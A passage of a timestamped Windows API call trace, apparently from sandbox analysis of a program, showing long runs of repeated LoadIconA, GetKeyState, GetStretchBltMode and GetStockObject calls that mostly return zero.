(hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.266] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.266] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.266] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.266] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.266] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.266] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.266] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.266] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.266] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.267] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.268] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.269] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.270] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.271] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.272] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.273] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.274] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.275] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.276] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.276] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.276] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.276] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.276] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.276] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.276] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.276] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.276] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.276] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.276] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.276] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.276] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.276] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.276] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.277] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.343] GetKeyState (nVirtKey=1) returned 0 [0181.343] GetStretchBltMode (hdc=0x1) returned 0 [0181.343] GetStockObject (i=789644) returned 0x0 [0181.343] GetStockObject (i=789644) returned 0x0 [0181.343] GetStockObject (i=789644) returned 0x0 [0181.343] GetStockObject (i=789644) returned 0x0 [0181.343] GetStockObject (i=789644) returned 0x0 [0181.343] GetStockObject (i=789644) returned 0x0 [0181.343] GetStockObject (i=789644) returned 0x0 [0181.343] GetStockObject (i=789644) returned 0x0 [0181.343] GetStockObject (i=789644) returned 0x0 [0181.343] GetStockObject (i=789644) returned 0x0 [0181.343] GetStockObject (i=789644) returned 0x0 [0181.343] GetStockObject (i=789644) returned 0x0 [0181.343] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetKeyState (nVirtKey=1) returned 0 [0181.344] GetStretchBltMode (hdc=0x1) returned 0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetKeyState (nVirtKey=1) returned 0 [0181.344] GetStretchBltMode (hdc=0x1) returned 0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetStockObject (i=789644) returned 0x0 [0181.344] GetKeyState (nVirtKey=1) returned 0 [0181.345] GetStretchBltMode (hdc=0x1) returned 0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetKeyState (nVirtKey=1) returned 0 [0181.345] GetStretchBltMode (hdc=0x1) returned 0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetKeyState (nVirtKey=1) returned 0 [0181.345] GetStretchBltMode (hdc=0x1) returned 0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.345] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetKeyState (nVirtKey=1) returned 0 [0181.346] GetStretchBltMode (hdc=0x1) returned 0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetKeyState (nVirtKey=1) returned 0 [0181.346] GetStretchBltMode (hdc=0x1) returned 0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.346] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetKeyState (nVirtKey=1) returned 0 [0181.347] GetStretchBltMode (hdc=0x1) returned 0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetKeyState (nVirtKey=1) returned 0 [0181.347] GetStretchBltMode (hdc=0x1) returned 0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetStockObject (i=789644) returned 0x0 [0181.347] GetKeyState (nVirtKey=1) returned 0 [0181.347] GetStretchBltMode (hdc=0x1) returned 0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetKeyState (nVirtKey=1) returned 0 [0181.348] GetStretchBltMode (hdc=0x1) returned 0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetKeyState (nVirtKey=1) returned 0 [0181.348] GetStretchBltMode (hdc=0x1) returned 0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 